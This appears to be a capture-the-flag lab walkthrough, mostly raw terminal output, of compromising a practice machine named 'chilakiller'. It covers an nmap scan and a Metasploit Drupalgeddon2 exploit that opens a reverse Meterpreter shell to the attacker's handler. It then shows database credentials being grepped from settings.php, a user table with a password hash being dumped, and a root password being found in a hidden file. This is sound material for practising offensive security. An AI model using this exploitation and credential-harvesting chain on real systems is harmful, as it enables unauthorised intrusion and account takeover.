.
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
| 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp open http nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
| working. Further configuration is required.</p>
| <p>For online documentation and support please refer to
| href="http://nginx.org/">nginx.org</a>.<br/>
| Commercial support is available at
| href="http://nginx.com/">nginx.com</a>.</p>
| <p><em>Thank you for using nginx.</em></p>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Content-Length: 299
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_ </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
|--snipp-- \x2080</address>\n</body></
SF:html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run
[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200
ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >
cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!-- FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 -->
</body>
</html>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
<nte/sites/default$ cat settings.php | grep password
* 'password' => 'password',
* username, password, host, and database name.
* 'password' => 'password',
* 'password' => 'password',
* 'password' => 'password',
* 'password' => 'password',
'password' => 'EstaContraNoesTanImp0rtant3!!!',
* by using the username and password variables. The proxy_user_agent variable
# $conf['proxy_password'] = '';
www-data@chilakiller:/var/www/html/restaurante/sites/default$
www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
</html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
MariaDB [drupaldb]> select * from ptd_users;
select * from ptd_users;
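+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local | | | NULL | 1596317328 | 1643552710 | 1643551677 | 1 | America/Mexico_City | | 0 | chilakiller@ptd.local | b:0; |
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+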
2 rows in set (0.00 sec)
MariaDB [drupaldb]>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1
user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$
user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$
su root
pw = ChilaKill3s_Tru3_L0v3R (the second line of the hidden file read above as user1; it is also the root password)
root@chilakiller:~# cat FLAG2.txt
cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762
root@chilakiller:/var/www/html/restaurante# find / -name "FLAG1.txt"
find / -name "FLAG1.txt"
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
<rante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#
root@chilakiller:/var/www/html/restaurante# hostnamectl
hostnamectl
Static hostname: chilakiller
Icon name: computer-vm
Chassis: vm
Machine ID: c8677bebac964d43bed5ebe1af1caaa6
Boot ID: 907f69a447f04a8782bde75417cec04a
Virtualization: vmware
Operating System: Debian GNU/Linux 9 (stretch)
Kernel: Linux 4.9.0-13-amd64
Architecture: x86-64
root@chilakiller:/var/www/html/restaurante#
Author : Puckiestyle